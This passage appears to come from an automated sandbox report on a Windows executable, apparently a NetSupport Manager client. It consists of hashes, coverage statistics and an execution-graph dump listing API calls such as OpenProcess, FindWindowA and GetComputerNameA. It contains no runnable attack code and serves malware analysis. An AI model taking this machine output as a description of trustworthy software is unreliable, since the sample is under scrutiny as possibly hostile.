                                                                                                    • Opcode Fuzzy Hash: 69d0a4a3c3090d04e2ec7ec9360c47687313fc4f1e84435cc83365359cc27956
                                                                                                    • Instruction Fuzzy Hash: C801A773504629EBDB228F94DC05BBEBBB8FB44B25F00422AF811A2294D7749A40CB90

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:5.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0.3%
                                                                                                    Signature Coverage:9.3%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:77
                                                                                                    execution_graph 49042 10007a80 49049 10281dad 49042->49049 49045 10007ae0 49046 10007abb _FreeImage_GetFileTypeFromHandle 49052 10281eea 40 API calls ___std_exception_copy 49046->49052 49048 10007ad3 49053 10281cf6 49049->49053 49051 10007ab2 49051->49045 49051->49046 49052->49048 49055 10281d02 49053->49055 49054 10281d09 ___std_exception_copy 49054->49051 49055->49054 49057 10281d8b LeaveCriticalSection 49055->49057 49057->49054 49058 107046b2 49061 107046c4 49058->49061 49062 107046c1 49061->49062 49064 107046cb ___free_lc_time 49061->49064 49064->49062 49065 107046f0 49064->49065 49066 1070471d 49065->49066 49069 10704760 49065->49069 49072 1070474b 49066->49072 49083 10707967 29 API calls 2 library calls 49066->49083 49068 107047cf RtlAllocateHeap 49071 10704752 49068->49071 49069->49072 49073 10704782 49069->49073 49070 10704733 49084 107064da 5 API calls ___free_lc_time 49070->49084 49071->49064 49072->49068 49072->49071 49086 10707967 29 API calls 2 library calls 49073->49086 49076 1070473e 49085 10704757 LeaveCriticalSection _wctomb_s 49076->49085 49077 10704789 49087 1070739f 6 API calls ___free_lc_time 49077->49087 49080 1070479c 49088 107047b6 LeaveCriticalSection _wctomb_s 49080->49088 49082 107047a9 49082->49071 49082->49072 49083->49070 49084->49076 49085->49072 49086->49077 49087->49080 49088->49082 49089 1112c090 49099 1113b690 49089->49099 49095 1112c133 CreateWindowExA 49115 11157561 49095->49115 49096 1112c131 49096->49095 49098 1112c17c 49100 1113b6b1 49099->49100 49101 1113b78d 49099->49101 49123 1113b580 8 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 49100->49123 49103 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49101->49103 49105 1112c0ad AdjustWindowRectEx 49103->49105 49104 1113b6b6 49104->49101 49106 1113b6c4 _memset 49104->49106 49113 11091880 49105->49113 49107 1113b6da GetVersionExA LoadLibraryA 49106->49107 49108 1113b721 GetProcAddress 49107->49108 49109 1113b74a GetSystemDefaultLangID 49107->49109 49110 1113b73e FreeLibrary 49108->49110 49112 1113b731 49108->49112 49111 1113b75b 49109->49111 49110->49109 49110->49111 49111->49101 49112->49110 49114 11091889 7 API calls 49113->49114 49114->49095 49114->49096 49116 11157569 49115->49116 49117 1115756b IsDebuggerPresent 49115->49117 49116->49098 49119 1116cc17 49117->49119 49120 11161459 SetUnhandledExceptionFilter UnhandledExceptionFilter 49119->49120 49121 11161476 49120->49121 49122 1116147e GetCurrentProcess TerminateProcess 49120->49122 49121->49122 49122->49098 49123->49104 49124 7e21020 GetCommandLineA 49125 7e21035 GetStartupInfoA 49124->49125 49127 7e21090 GetModuleHandleA 49125->49127 49128 7e2108b 49125->49128 49131 7e21000 _NSMClient32 49127->49131 49128->49127 49130 7e210a2 ExitProcess 49131->49130 49132 1102cee0 49133 1102cf23 49132->49133 49378 111077a0 49133->49378 49135 1102cf2a 49140 1102cfa1 49135->49140 49905 1107d280 49135->49905 49137 1102cf86 49138 1107d280 15 API calls 49137->49138 49138->49140 49139 1102d006 49141 1102d085 CreateEventA 49139->49141 49142 1102d05f GetSystemMetrics 49139->49142 49140->49139 49145 1113b380 21 API calls 49140->49145 49146 1102d0a5 49141->49146 49147 1102d0b9 49141->49147 49142->49141 49143 1102d06e 49142->49143 49912 1102bc80 519 API calls 2 library calls 49143->49912 49145->49139 49913 11027f50 6 API calls 49146->49913 49149 111077a0 std::locale::facet::_Facet_Register 22 API calls 49147->49149 49151 1102d0c0 49149->49151 49152 1102d0e0 49151->49152 49914 11108440 49151->49914 49154 111077a0 std::locale::facet::_Facet_Register 22 API calls 49152->49154 49155 1102d0f4 49154->49155 49156 11108440 178 API calls 49155->49156 49157 1102d114 49155->49157 49156->49157 49158 111077a0 std::locale::facet::_Facet_Register 22 API calls 49157->49158 49159 1102d193 49158->49159 49160 1102d1c3 49159->49160 49942 1105d0a0 49159->49942 49162 111077a0 std::locale::facet::_Facet_Register 22 API calls 49160->49162 49164 1102d1dd 49162->49164 49163 1102d206 FindWindowA 49165 1102d357 49163->49165 49166 1102d23b 49163->49166 49164->49163 49387 1105d4f0 49165->49387 49166->49165 49169 1102d253 GetWindowThreadProcessId 49166->49169 49172 1113c600 49169->49172 49170 1105d4f0 24 API calls 49171 1102d375 49170->49171 49173 1105d4f0 24 API calls 49171->49173 49174 1102d279 OpenProcess 49172->49174 49175 1102d381 49173->49175 49174->49165 49179 1102d299 49174->49179 49394 1113bb60 49175->49394 49177 1102d3a7 49409 1113b0a0 ExpandEnvironmentStringsA 49177->49409 49178 1102d30b CloseHandle FindWindowA 49180 1102d333 GetWindowThreadProcessId 49178->49180 49181 1102d347 49178->49181 49179->49178 49183 1102d2de SendMessageA WaitForSingleObject 49179->49183 49180->49181 49181->49165 49183->49178 49185 1102d2fe 49183->49185 49185->49178 49187 1102d3ca 49189 1102d4a1 49187->49189 49431 1105ee80 49187->49431 49197 1102d4e1 49189->49197 49951 11028f80 49189->49951 49192 1102d3f1 49192->49189 49200 1102d452 49192->49200 49948 1105db60 6 API calls 49192->49948 49193 11137810 548 API calls 49196 1102d4fd 49193->49196 49194 11028f80 104 API calls 49194->49197 49446 1102c3d0 49196->49446 49197->49193 49197->49196 49198 1102d427 49198->49200 49949 1105db80 104 API calls 49198->49949 49200->49189 49203 1102d477 49200->49203 49950 1102bc80 519 API calls 2 library calls 49203->49950 49205 1102d432 49205->49200 49209 1105ee80 169 API calls 49205->49209 49207 1102d636 49210 1102d654 49207->49210 49213 1113b380 21 API calls 49207->49213 49209->49200 49512 1113b570 49210->49512 49212 1102d546 IsILS 49232 1102d55f 49212->49232 49213->49210 49215 1102d683 49217 1102d6af 49215->49217 49218 1102d6a3 49215->49218 49216 11059e50 6 API calls 49216->49215 49220 1102d6f3 49217->49220 49221 1102d6bf LoadIconA LoadIconA 49217->49221 49956 110f7de0 133 API calls 2 library calls 49218->49956 49515 1113a820 49220->49515 49221->49220 49223 1102d622 49955 11027f50 6 API calls 49223->49955 49224 1102d710 49228 1102d71d DestroyCursor 49224->49228 49229 1102d724 49224->49229 49225 1102d6f8 49225->49224 49227 1102d709 DestroyCursor 49225->49227 49227->49224 49228->49229 49230 1102d7a3 49229->49230 49231 11059e50 6 API calls 49229->49231 49519 11059e50 49230->49519 49237 1102d76b 49231->49237 49232->49207 49232->49223 49233 1102d609 49232->49233 49954 1102bc80 519 API calls 2 library calls 49233->49954 49235 1102d7c0 49238 11059e50 6 API calls 49235->49238 49237->49230 49957 11059f80 5 API calls 2 library calls 49237->49957 49240 1102d7de 49238->49240 49241 11059e50 6 API calls 49240->49241 49242 1102d800 49241->49242 49527 11029e50 49242->49527 49245 11029e50 106 API calls 49249 1102d81a 49245->49249 49246 1113b690 13 API calls 49247 1102d92d 49246->49247 49536 1113b380 49247->49536 49249->49246 49250 1102d95d 49259 1102d996 49250->49259 49559 110a4800 LoadLibraryA GetProcAddress 49250->49559 49252 11059e50 6 API calls 49253 1102db2a 49252->49253 49254 1113b0a0 122 API calls 49253->49254 49258 1102db47 49253->49258 49256 1102db3e 49254->49256 49255 11059e50 6 API calls 49260 1102db75 49255->49260 49257 111395a0 8 API calls 49256->49257 49257->49258 49258->49255 49259->49252 49261 1113b380 21 API calls 49260->49261 49262 1102dbc1 49260->49262 49261->49262 49263 1102dc16 49262->49263 49264 1102dc0c 49262->49264 49265 1102dc4f GetVersion 49263->49265 49271 11059e50 6 API calls 49263->49271 49958 1102bc80 519 API calls 2 library calls 49264->49958 49266 1102dc59 49265->49266 49278 1102dc7b 49265->49278 49959 1112aac0 49266->49959 49269 1102dc91 GetVersionExA 49281 1102dcb4 49269->49281 49270 1102e12f 49273 1102e17b 49270->49273 49276 11059e50 6 API calls 49270->49276 49274 1102dc41 49271->49274 49272 1102dc5e 49275 11059e50 6 API calls 49272->49275 49277 11059e50 6 API calls 49273->49277 49274->49265 49275->49278 49276->49273 49279 1102e19d 49277->49279 49278->49269 49278->49270 49280 1102e214 49279->49280 49286 1102e1a6 49279->49286 49285 11059e50 6 API calls 49280->49285 49287 1102e242 49280->49287 49595 111391f0 49281->49595 49282 1102e1b2 Sleep 49282->49286 49285->49287 49286->49280 49286->49282 49288 1102e1e2 PeekMessageA 49286->49288 49600 11029ee0 49287->49600 49288->49286 49289 1102e1f4 DispatchMessageA PeekMessageA 49288->49289 49289->49286 49289->49289 49290 1102e29a 49293 1102e316 49290->49293 49294 1102e2c6 49290->49294 49304 1102e325 49290->49304 49291 111077a0 std::locale::facet::_Facet_Register 22 API calls 49292 1102e366 49291->49292 49295 1102e394 49292->49295 49606 110702b0 49292->49606 49298 111077a0 std::locale::facet::_Facet_Register 22 API calls 49293->49298 49293->49304 49296 111077a0 std::locale::facet::_Facet_Register 22 API calls 49294->49296 49642 110258f0 49295->49642 49299 1102e2d0 49296->49299 49298->49304 49300 1102e2e1 49299->49300 49303 1102e2fc 49299->49303 49979 111435a0 229 API calls 3 library calls 49300->49979 49980 110ffee0 189 API calls 49303->49980 49304->49291 49304->49295 49306 1102e311 49306->49304 49307 1102e40c 49667 11133750 49307->49667 49308 1102e3c3 49308->49307 49664 11027e70 49308->49664 49983 111583b1 49378->49983 49380 111077be 49381 111077c7 wsprintfA 49380->49381 49383 111077f3 _memset 49380->49383 49989 11027f50 6 API calls 49381->49989 49385 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49383->49385 49386 1110780d 49385->49386 49386->49135 49388 1105d566 49387->49388 49393 1105d517 49387->49393 49389 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49388->49389 49390 1102d369 49389->49390 49390->49170 49391 1107d280 15 API calls 49391->49393 49393->49388 49393->49391 49991 1105d410 15 API calls 3 library calls 49393->49991 49992 1113aeb0 49394->49992 49397 1113aeb0 120 API calls 49398 1113bb97 wsprintfA 49397->49398 49399 111395a0 8 API calls 49398->49399 49400 1113bbb4 49399->49400 49401 1113bbe0 49400->49401 49402 111395a0 8 API calls 49400->49402 49403 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49401->49403 49404 1113bbc9 49402->49404 49405 1113bbec 49403->49405 49404->49401 49406 1113bbd0 49404->49406 49405->49177 49407 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49406->49407 49408 1113bbdc 49407->49408 49408->49177 49410 1113b0d7 49409->49410 49411 1113b10e 49410->49411 49412 1113b0f4 49410->49412 49419 1113b0e4 49410->49419 49413 1113aeb0 120 API calls 49411->49413 49414 1113b105 GetModuleFileNameA 49412->49414 49415 1113b114 49413->49415 49414->49415 49417 1107d210 2 API calls 49415->49417 49416 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49418 1102d3b8 49416->49418 49417->49419 49420 111395a0 49418->49420 49419->49416 49421 111395c1 CreateFileA 49420->49421 49423 1113965e CloseHandle 49421->49423 49424 1113963e 49421->49424 49427 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49423->49427 49425 11139642 CreateFileA 49424->49425 49426 1113967b 49424->49426 49425->49423 49425->49426 49429 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49426->49429 49428 11139677 49427->49428 49428->49187 49430 1113968a 49429->49430 49430->49187 49432 11059e50 6 API calls 49431->49432 49433 1105eea8 49432->49433 50034 1105ddb0 49433->50034 49435 1105efa5 49435->49192 49438 1105ef09 49439 11059e50 6 API calls 49438->49439 49440 1105ef3d 49439->49440 49441 1105ef5c 49440->49441 50127 11059f80 5 API calls 2 library calls 49440->50127 49442 11059e50 6 API calls 49441->49442 49444 1105ef8c 49442->49444 49444->49435 50128 11059f80 5 API calls 2 library calls 49444->50128 49447 111077a0 std::locale::facet::_Facet_Register 22 API calls 49446->49447 49452 1102c410 _strncpy 49447->49452 49448 1102c613 49449 1113b0a0 122 API calls 49448->49449 49450 1102c62f 49448->49450 49459 1102c69a 49448->49459 49449->49450 50435 1102b560 49450->50435 49452->49448 49456 1102b560 190 API calls 49452->49456 49455 1102c668 49455->49459 49464 1102c6e8 49455->49464 49456->49452 49457 11059e50 6 API calls 49463 1102c746 49457->49463 49458 11029e50 106 API calls 49461 1102c75e 49458->49461 50468 1113c580 49459->50468 49460 1102c945 GetComputerNameA 49467 1102c968 49460->49467 49461->49460 49462 1102c79a 49461->49462 49468 1102c77a 49461->49468 49462->49460 49463->49458 49463->49461 50474 1102bc80 519 API calls 2 library calls 49464->50474 49465 1102c9da _strncpy 49470 1102cc14 49465->49470 49483 1102cc32 49465->49483 49467->49465 49471 1102ca00 49467->49471 50476 1107d140 49467->50476 49472 1102c7fc LoadLibraryA GetProcAddress 49468->49472 50485 1102bc80 519 API calls 2 library calls 49470->50485 49476 1107d140 IsDBCSLeadByte 49471->49476 49473 1102c915 SetLastError 49472->49473 49480 1102c886 49472->49480 49474 1102c8bd 49473->49474 49477 1102c90a 49474->49477 49478 1102c8fa GetProcAddress 49474->49478 49481 1102c910 49474->49481 49487 1102ca81 49476->49487 49477->49481 49482 1102c91f SetLastError 49477->49482 49478->49477 49479 1102c93e FreeLibrary 49479->49460 49480->49474 50475 11123400 10 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 49480->50475 49481->49460 49481->49479 49482->49481 49485 1102cc94 GetCurrentProcessId 49483->49485 49488 1102cca3 49485->49488 49486 1102cbdc CharUpperA 49486->49465 49489 1102cace wsprintfA 49487->49489 49508 1102cbca _strncpy 49487->49508 49490 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49488->49490 49491 110b24c0 49489->49491 49492 1102ccd5 49490->49492 49493 1102cae5 wsprintfA 49491->49493 49509 1105dbd0 49492->49509 49494 1102cb0b 49493->49494 49495 1102cb0f 49494->49495 49498 1102cb23 49494->49498 50480 11027f50 6 API calls 49495->50480 49497 1102cb52 50482 110c9d30 21 API calls std::locale::facet::_Facet_Register 49497->50482 49498->49497 50481 110c9d30 21 API calls std::locale::facet::_Facet_Register 49498->50481 49501 1102cb66 50483 110c9d30 21 API calls std::locale::facet::_Facet_Register 49501->50483 49503 1102cb7a 49504 1102cba2 _strncpy 49503->49504 49505 1102cb8e 49503->49505 49507 110c9920 7 API calls 49504->49507 50484 11027f50 6 API calls 49505->50484 49507->49508 49508->49486 49510 11059e50 6 API calls 49509->49510 49511 1102d524 49510->49511 49511->49207 49511->49212 49513 1113b380 21 API calls 49512->49513 49514 1102d667 49513->49514 49514->49215 49514->49216 49516 1113a82e 49515->49516 49517 1113a829 49515->49517 49516->49225 50559 1113a7b0 GetModuleFileNameA ExtractIconExA 49517->50559 49520 11059e7f 49519->49520 49521 11059ea5 49520->49521 49522 11059e85 __wcstoi64 49520->49522 49524 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49521->49524 49523 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49522->49523 49525 11059e9f 49523->49525 49526 11059eb2 49524->49526 49525->49235 49526->49235 49528 11028f80 104 API calls 49527->49528 49529 11029e60 49528->49529 49530 11029ea8 49529->49530 49531 11059e50 6 API calls 49529->49531 49532 11029ead 49530->49532 49533 11028f80 104 API calls 49530->49533 49531->49530 49532->49245 49532->49249 49534 11029ec6 49533->49534 49535 1107d280 15 API calls 49534->49535 49535->49532 49537 1113b3a1 GetVersionExA 49536->49537 49546 1113b4e5 49536->49546 49539 1113b3c3 49537->49539 49537->49546 49538 1113b4ee 49540 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49538->49540 49541 1113b3d0 RegOpenKeyExA 49539->49541 49539->49546 49542 1113b4fb 49540->49542 49544 1113b3fd _memset 49541->49544 49541->49546 49542->49250 49543 1113b54d 49545 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49543->49545 50562 11139370 RegQueryValueExA 49544->50562 49547 1113b55d 49545->49547 49546->49538 49546->49543 49549 1107d330 15 API calls 49546->49549 49547->49250 49551 1113b535 49549->49551 49551->49538 49551->49543 49552 11139370 RegQueryValueExA 49554 1113b469 49552->49554 49553 1113b4d8 RegCloseKey 49553->49546 49554->49553 50564 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 49554->50564 49556 1113b489 49558 1113b4a2 _strncpy 49556->49558 50565 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 49556->50565 49558->49553 49560 110a4868 SetupDiGetClassDevsA 49559->49560 49561 110a4975 SetLastError 49559->49561 49562 110a4a83 49560->49562 49586 110a487f 49560->49586 49565 110a4989 SetLastError 49561->49565 49563 110a4a0b 49562->49563 49564 110a4a87 FreeLibrary 49562->49564 49568 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49563->49568 49564->49563 49567 110a4991 GetLastError 49565->49567 49566 110a4896 GetProcAddress 49566->49565 49566->49586 49569 110a49a2 _free 49567->49569 49570 110a4a30 GetProcAddress 49567->49570 49573 110a4abf 49568->49573 49569->49586 49571 110a4a4b SetLastError 49570->49571 49572 110a4a43 SetupDiDestroyDeviceInfoList 49570->49572 49574 110a4a53 49571->49574 49572->49574 49573->49259 49574->49562 49575 110a4a57 CreateFileA 49574->49575 49577 110a4a7b _free 49575->49577 49578 110a4a92 _free 49575->49578 49576 110a48cf _free 49576->49586 49577->49562 49580 110a4a9e FreeLibrary 49578->49580 49581 110a4aa5 49578->49581 49579 110a48dc GetProcAddress 49582 110a49b2 SetLastError 49579->49582 49579->49586 49580->49581 49581->49563 49583 110a490d GetLastError 49582->49583 49584 110a49f1 49583->49584 49583->49586 49584->49563 49588 110a4a04 FreeLibrary 49584->49588 49585 111583b1 _malloc 15 API calls 49585->49586 49586->49566 49586->49567 49586->49576 49586->49579 49586->49583 49586->49585 49587 110a4a12 49586->49587 49589 110a493f GetProcAddress 49586->49589 49591 110a49c7 49586->49591 49587->49563 49592 110a4a25 FreeLibrary 49587->49592 49588->49563 49589->49586 49590 110a49bf SetLastError 49589->49590 49590->49591 49593 110a49d3 _free 49591->49593 49592->49563 49593->49563 49594 110a49e3 FreeLibrary 49593->49594 49594->49563 49596 111391f9 49595->49596 49597 111391ff 49595->49597 49596->49270 49598 11028f80 104 API calls 49597->49598 49599 11139216 49598->49599 49599->49270 49601 11029eec 49600->49601 49605 11029f24 49600->49605 49602 11029f19 49601->49602 49603 11059e50 6 API calls 49601->49603 49604 11029e50 106 API calls 49602->49604 49602->49605 49603->49602 49604->49605 49605->49290 49607 11070306 49606->49607 49608 111077a0 std::locale::facet::_Facet_Register 22 API calls 49607->49608 49609 11070321 49608->49609 49610 11070605 49609->49610 49611 1107032c 49609->49611 50577 111579fa 15 API calls std::exception::_Copy_str 49610->50577 49612 111077a0 std::locale::facet::_Facet_Register 22 API calls 49611->49612 49614 11070362 49612->49614 49616 1107037c 6 API calls 49614->49616 49615 1107061d 50578 11157e51 RaiseException 49615->50578 49618 110703c1 49616->49618 49619 110703d8 49616->49619 49624 11070638 49624->49295 49643 11025928 49642->49643 49644 1102590f 49642->49644 49648 11025943 49643->49648 49649 1102596d _strtok 49643->49649 49644->49643 49645 11025917 49644->49645 49646 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49645->49646 49647 11025924 49646->49647 49647->49308 49650 11059e50 6 API calls 49648->49650 49649->49648 49658 11025982 49649->49658 49651 11025a15 49650->49651 49651->49651 49653 11025ad1 49651->49653 50581 110715c0 49651->50581 49652 110259bd 49652->49648 49654 11059e50 6 API calls 49652->49654 49655 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49653->49655 49654->49648 49659 11025af6 49655->49659 49657 110259a6 _strtok 49657->49652 49657->49658 49658->49652 49658->49657 49659->49308 49665 11059e50 6 API calls 49664->49665 49666 11027e8c 49665->49666 49666->49307 49668 11133785 49667->49668 49906 1107d292 49905->49906 49907 1107d28d 49905->49907 49911 1107d2af 49906->49911 50972 11159d1c 14 API calls 2 library calls 49906->50972 50971 1107d060 IsDBCSLeadByte 49907->50971 49910 1107d2a8 49910->49137 49911->49137 49915 111077a0 std::locale::facet::_Facet_Register 22 API calls 49914->49915 49916 11108471 49915->49916 49917 11108493 GetCurrentThreadId InitializeCriticalSection 49916->49917 49919 111077a0 std::locale::facet::_Facet_Register 22 API calls 49916->49919 49920 11108500 EnterCriticalSection 49917->49920 49921 111084f3 InitializeCriticalSection 49917->49921 49922 1110848c 49919->49922 49923 111085ba LeaveCriticalSection 49920->49923 49924 1110852e CreateEventA 49920->49924 49921->49920 49922->49917 50973 111579fa 15 API calls std::exception::_Copy_str 49922->50973 49923->49152 49925 11108541 49924->49925 49926 11108558 49924->49926 50975 11027f50 6 API calls 49925->50975 49929 111077a0 std::locale::facet::_Facet_Register 22 API calls 49926->49929 49932 1110855f 49929->49932 49930 111084af 50974 11157e51 RaiseException 49930->50974 49934 11108440 172 API calls 49932->49934 49935 1110857c 49932->49935 49934->49935 49936 111077a0 std::locale::facet::_Facet_Register 22 API calls 49935->49936 49937 1110858c 49936->49937 49938 1110859d 49937->49938 50976 111078a0 InterlockedIncrement InterlockedIncrement CreateEventA 49937->50976 49940 11107630 172 API calls 49938->49940 49941 111085b5 49940->49941 49941->49923 49943 1105d0de 49942->49943 49944 111077a0 std::locale::facet::_Facet_Register 22 API calls 49943->49944 49945 1105d10b 49944->49945 49946 111077a0 std::locale::facet::_Facet_Register 22 API calls 49945->49946 49947 1105d135 49946->49947 49947->49160 49948->49198 49949->49205 50977 110270f0 49951->50977 49953 11028f8e 49953->49194 49956->49217 49957->49230 49960 1112abe4 49959->49960 49963 1112aae1 49959->49963 49961 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49960->49961 49962 1112ac15 49961->49962 49962->49272 49964 1112aaf6 49963->49964 49965 1112ab0d 49963->49965 49966 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49964->49966 49967 1113aeb0 120 API calls 49965->49967 49968 1112ab09 49966->49968 49969 1112ab1a wsprintfA 49967->49969 49968->49272 49970 111395a0 8 API calls 49969->49970 49971 1112ab40 49970->49971 49972 1112ab47 49971->49972 49973 1112abb8 49971->49973 49972->49960 49977 1112ab5a GetTickCount SHGetFolderPathA GetTickCount 49972->49977 49974 1113aeb0 120 API calls 49973->49974 49975 1112abc4 wsprintfA 49974->49975 49976 111395a0 8 API calls 49975->49976 49976->49960 49978 1112ab85 49977->49978 49978->49960 49979->49303 49980->49306 49987 111583bf 49983->49987 49988 11158418 49983->49988 49985 111583cf __NMSG_WRITE 49985->49987 49986 111583ed RtlAllocateHeap 49986->49987 49986->49988 49987->49986 49987->49988 49990 1116315d 13 API calls __FF_MSGBANNER 49987->49990 49988->49380 49990->49985 49991->49393 49993 1113aed2 49992->49993 49996 1113aee9 49992->49996 50031 11027f50 6 API calls 49993->50031 49998 1113af1c GetModuleFileNameA 49996->49998 50003 1113b028 49996->50003 49997 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49999 1113b093 wsprintfA 49997->49999 50014 1107d210 _strrchr 49998->50014 49999->49397 50001 1113af31 50002 1113af41 SHGetFolderPathA 50001->50002 50001->50003 50004 1113af8d SHGetFolderPathA 50002->50004 50005 1113af6e 50002->50005 50003->49997 50007 1113afc2 50004->50007 50005->50004 50008 1113af74 50005->50008 50010 11028f80 104 API calls 50007->50010 50032 11027f50 6 API calls 50008->50032 50012 1113afd3 50010->50012 50018 1113a9e0 50012->50018 50015 1107d22c 50014->50015 50017 1107d23a 50014->50017 50015->50017 50033 1107d060 IsDBCSLeadByte 50015->50033 50017->50001 50019 1113a9eb 50018->50019 50020 1113aa6a 50018->50020 50019->50020 50021 1113a9fb GetFileAttributesA 50019->50021 50020->50003 50022 1113aa07 50021->50022 50023 1113aa15 __strdup 50021->50023 50022->50003 50024 1107d210 2 API calls 50023->50024 50025 1113aa26 50024->50025 50026 1113a9e0 2 API calls 50025->50026 50030 1113aa46 50025->50030 50027 1113aa36 50026->50027 50028 1113aa3e _free 50027->50028 50029 1113aa4c _free CreateDirectoryA 50027->50029 50028->50030 50029->50030 50030->50003 50033->50017 50129 1113b180 50034->50129 50036 1105de3c 50037 1105e037 50036->50037 50038 1105de64 50036->50038 50138 1115975d 50036->50138 50040 1115975d _fgets 35 API calls 50037->50040 50039 1105eda8 50038->50039 50205 11159081 16 API calls 2 library calls 50038->50205 50043 110c9920 7 API calls 50039->50043 50044 1105e051 50040->50044 50117 1105df31 50043->50117 50050 1105e0b7 _strpbrk 50044->50050 50051 1105e058 50044->50051 50045 1105dee7 50046 1105deee 50045->50046 50060 1105df3d _strpbrk 50045->50060 50047 1105df23 50046->50047 50170 11159081 16 API calls 2 library calls 50046->50170 50171 110c9920 50047->50171 50049 1105e0d2 __wcstoui64 50149 1113b220 50049->50149 50050->50049 50052 1105e09d 50051->50052 50179 11159081 16 API calls 2 library calls 50051->50179 50056 110c9920 7 API calls 50052->50056 50056->50117 50057 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50058 1105eddf 50057->50058 50058->49435 50058->49438 50126 11059f80 5 API calls 2 library calls 50058->50126 50059 1115975d _fgets 35 API calls 50088 1105e0fc _strpbrk 50059->50088 50061 1113b220 5 API calls 50060->50061 50062 1105dfc9 50061->50062 50062->50037 50064 1105dfd8 50062->50064 50063 1105e578 50067 1105e651 GetTickCount 50063->50067 50063->50117 50069 1105e01d 50064->50069 50178 11159081 16 API calls 2 library calls 50064->50178 50065 1105e51a 50065->50063 50183 1105d820 50065->50183 50068 111391f0 104 API calls 50067->50068 50070 1105e669 CheckLicenseString wsprintfA 50068->50070 50072 110c9920 7 API calls 50069->50072 50073 1105e6a0 50070->50073 50072->50117 50074 1105e6c2 ExitProcess 50073->50074 50076 11059e50 6 API calls 50073->50076 50075 1107d140 IsDBCSLeadByte 50075->50088 50077 1105e6e8 50076->50077 50079 11059e50 6 API calls 50077->50079 50077->50117 50081 1105e74c 50079->50081 50080 1107d280 15 API calls 50080->50088 50082 11059e50 6 API calls 50081->50082 50081->50117 50083 1105e767 50082->50083 50084 11059e50 6 API calls 50083->50084 50083->50117 50085 1105e783 50084->50085 50086 11028f80 104 API calls 50085->50086 50089 1105e79d 50086->50089 50087 1105e488 GetTickCount CheckLicenseString wsprintfA 50091 1105e4d0 50087->50091 50088->50038 50088->50059 50088->50065 50088->50075 50088->50080 50088->50087 50088->50117 50156 1107d4c0 50088->50156 50180 1113bd30 50088->50180 50090 1107d280 15 API calls 50089->50090 50089->50117 50108 1105e7c2 50090->50108 50091->50074 50091->50088 50093 1105e87a GetTickCount 50093->50108 50094 111391f0 104 API calls 50095 1105e8a4 CheckLicenseString wsprintfA 50094->50095 50095->50108 50096 1107d4c0 7 API calls 50096->50108 50097 1105e930 __wcstoi64 50097->50108 50098 1105eb5d 50162 11109840 50098->50162 50099 1105e963 __wcstoi64 50099->50108 50103 1105ebd3 50204 11109b40 30 API calls 3 library calls 50103->50204 50104 1105e996 __wcstoi64 50104->50108 50106 1105e9c6 __time64 50198 1115bbcd 17 API calls __localtime64_s 50106->50198 50108->50074 50108->50093 50108->50094 50108->50096 50108->50097 50108->50098 50108->50099 50108->50104 50108->50106 50112 1105eaa6 50108->50112 50114 1105ea35 50108->50114 50108->50117 50109 1105ec2b 50110 110c9920 7 API calls 50109->50110 50110->50117 50111 1105ebd9 50111->50109 50113 110c9920 7 API calls 50111->50113 50112->50117 50202 11139290 6 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 50112->50202 50113->50109 50116 11109840 9 API calls 50114->50116 50118 1105ea60 50116->50118 50117->50057 50119 1105ea7e 50118->50119 50199 110093d0 6 API calls std::locale::facet::_Facet_Register 50118->50199 50201 11059f80 5 API calls 2 library calls 50119->50201 50122 1105ea78 50200 11109b20 15 API calls 50122->50200 50123 1105ea9a 50125 110c9920 7 API calls 50123->50125 50125->50112 50126->49438 50127->49441 50128->49435 50137 1113b193 50129->50137 50130 1113b0a0 122 API calls 50130->50137 50132 1113b1fa 50132->50036 50133 1113b1b5 GetLastError 50134 1113b1c0 Sleep 50133->50134 50133->50137 50135 111592b7 92 API calls 50134->50135 50136 1113b1d2 50135->50136 50136->50132 50136->50137 50137->50130 50137->50132 50137->50133 50206 111592b7 50137->50206 50140 11159769 50138->50140 50139 1115977c 50378 111636c4 11 API calls _strcpy_s 50139->50378 50140->50139 50141 111597ad 50140->50141 50142 111597b2 __lock_file 50141->50142 50144 1115978c _fgets 50141->50144 50145 111597c6 50142->50145 50147 11159831 50142->50147 50144->50045 50145->50147 50379 111636c4 11 API calls _strcpy_s 50145->50379 50147->50144 50370 11166fa5 50147->50370 50150 1113b237 _strncpy 50149->50150 50153 1113b272 __crtGetStringTypeA_stat 50149->50153 50151 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50150->50151 50152 1113b26e 50151->50152 50152->50088 50154 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50153->50154 50155 1113b2c9 50154->50155 50155->50088 